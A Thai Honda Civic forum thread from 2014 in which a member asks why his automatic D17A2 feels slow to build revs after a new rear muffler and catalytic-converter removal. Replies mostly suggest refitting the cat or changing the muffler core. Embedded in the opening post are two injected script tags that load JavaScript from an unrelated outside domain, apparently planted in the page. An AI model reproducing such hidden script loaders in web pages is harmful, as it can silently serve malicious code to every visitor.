ตอบ
sett_w


ชื่อเล่น: เสฎ

เข้าร่วม: 27 กันยา 2011
ตอบ: 331

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 226
ให้คำขอบคุณ: 116

ที่อยู่: คอนหวัน-กทม.
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 7 มกรา 2014 00:14 - ขอคำชี้แนะจากกูรูท่อครับ(เปลี่ยนปลายมาแล้วรู้สึกว่ารอรอบกว่าเดิม)
เครื่องD17a2 Autoเปลี่ยนปลายมาแล้วรอรอบครับมีวิธีแก้ยังไงครับ รู้สึกได้เลยครับว่าเหมือนเกียร์ต่อเกียร์มันลากยาวกว่าเดิมครับ ปัจจุบันนะครับท่อเดิมเฮดเดิมพักกลางยังอยู่แต่เอาแคทออกแล้ว มีกูรูท่านไดจะชี้แนะบ้างครับ"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">  (หรืออาจจะเป็นเพราะปลายมันโล่งเกิน ถ้าง้ันมีวิธีไหนแก้บ้างครับ)


ประมาณนี้อ่ะครับปลายNitto
ประมาณนี้อ่ะครับปลายNitto
อีกมุมครับ (ขอคำชี้แนะด้วยครับ)
อีกมุมครับ (ขอคำชี้แนะด้วยครับ)
ได้รับคำขอบคุณจาก: N_J Civic 
xenshiro


ชื่อเล่น: เซน

เข้าร่วม: 02 ตุลา 2008
ตอบ: 831

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1265
ให้คำขอบคุณ: 1864

ที่อยู่: อ่อนนุช - ลาดพร้าว
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 7 มกรา 2014 11:00 - ขอคำชี้แนะจากกูรูท่อครับ(เปลี่ยนปลายมาแล้วรู้สึกว่ารอรอบกว่าเดิม)
ไม่ทราบว่าไส้กี่นิ้วครับ แล้วได้ลองแบบใส่แคตหรือยังครับ ว่าต่างกันมั้ยครับ

มอง 2 จุด
คือ 1. A/T โดนไส้ตรงที่กว้างไป ก็หายได้เหมือนกันครับ
2. เพราะเอาแคตออกครับ
losoman96


เข้าร่วม: 01 กรกฎา 2012
ตอบ: 59

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 15
ให้คำขอบคุณ: 26

ที่อยู่: Saraburi
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 7 มกรา 2014 11:19 - ขอคำชี้แนะจากกูรูท่อครับ(เปลี่ยนปลายมาแล้วรู้สึกว่ารอรอบกว่าเดิม)
รอเก็บข้อมูล
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
อังคาร, 7 มกรา 2014 13:09 - ขอคำชี้แนะจากกูรูท่อครับ(เปลี่ยนปลายมาแล้วรู้สึกว่ารอรอบกว่าเดิม)
ดูจากรูป กลางพักปลายมีรอยแดง ๆ ผมขอเดาว่าใบนี้เป็นใส้เยื้องละกัน(เนื่องจากไม่บอกว่าใส้อะไร) ลองแบบไม่เปลืองเงินผมเห็นด้วยกับคุณเซนคือเอาแคทใส่คืนดู ถ้ายังไม่ดีขึ้นลองหาใส้ย้อนพวก FGK มาใส่ดูครับ
song


เข้าร่วม: 10 กุมภา 2011
ตอบ: 9833

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5558
ให้คำขอบคุณ: 4415

ที่อยู่: ESเมืองทอง 100%
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 7 มกรา 2014 13:29 - ขอคำชี้แนะจากกูรูท่อครับ(เปลี่ยนปลายมาแล้วรู้สึกว่ารอรอบกว่าเดิม)
พักปลายJS ไส้อะไรอ่ะครับ ถ้าไส้ตรงล่ะก็จบถ้าเอามาใส่AT อ่ะครับ
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 7 มกรา 2014 13:56 - ขอคำชี้แนะจากกูรูท่อครับ(เปลี่ยนปลายมาแล้วรู้สึกว่ารอรอบกว่าเดิม)
ก่อนเปลี่ยนใบนี้ ใบเก่าเป็นของเดิมหรือป่าว ถ้าใบเก่าเป็นของเดิม ก็ไม่แปลกครับ วิธีแก้ก็หาปลายรูปแบบเหมือนของเดิมมาใส่ แต่เสียงก็จะหายไปด้วย ของพวกนี้บางทีต้องแลกได้อย่างเสียอย่าง
ได้รับคำขอบคุณจาก: sett_w 
N_J Civic


เข้าร่วม: 27 ตุลา 2009
ตอบ: 3806

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5146
ให้คำขอบคุณ: 5687

ที่อยู่: นิคม304 - ปราจีน - ชัยภูมิ
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 7 มกรา 2014 14:00 - ขอคำชี้แนะจากกูรูท่อครับ(เปลี่ยนปลายมาแล้วรู้สึกว่ารอรอบกว่าเดิม)
ใส่แคตกลับครับ
ได้รับคำขอบคุณจาก: akkarin_c 
sett_w


ชื่อเล่น: เสฎ

เข้าร่วม: 27 กันยา 2011
ตอบ: 331

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 226
ให้คำขอบคุณ: 116

ที่อยู่: คอนหวัน-กทม.
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 8 มกรา 2014 15:55 - ขอคำชี้แนะจากกูรูท่อครับ(เปลี่ยนปลายมาแล้วรู้สึกว่ารอรอบกว่าเดิม)
xenshiro พิมพ์ว่า:
ไม่ทราบว่าไส้กี่นิ้วครับ แล้วได้ลองแบบใส่แคตหรือยังครับ ว่าต่างกันมั้ยครับ

มอง 2 จุด
คือ 1. A/T โดนไส้ตรงที่กว้างไป ก็หายได้เหมือนกันครับ
2. เพราะเอาแคตออกครับ


Saka พิมพ์ว่า:
ดูจากรูป กลางพักปลายมีรอยแดง ๆ ผมขอเดาว่าใบนี้เป็นใส้เยื้องละกัน(เนื่องจากไม่บอกว่าใส้อะไร) ลองแบบไม่เปลืองเงินผมเห็นด้วยกับคุณเซนคือเอาแคทใส่คืนดู ถ้ายังไม่ดีขึ้นลองหาใส้ย้อนพวก FGK มาใส่ดูครับ


N_J Civic พิมพ์ว่า:
ใส่แคตกลับครับ


ขอบคุณสำหรับคำชี้แนะครับ คงต้องลองใส่แคทแล้วครับ
 
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.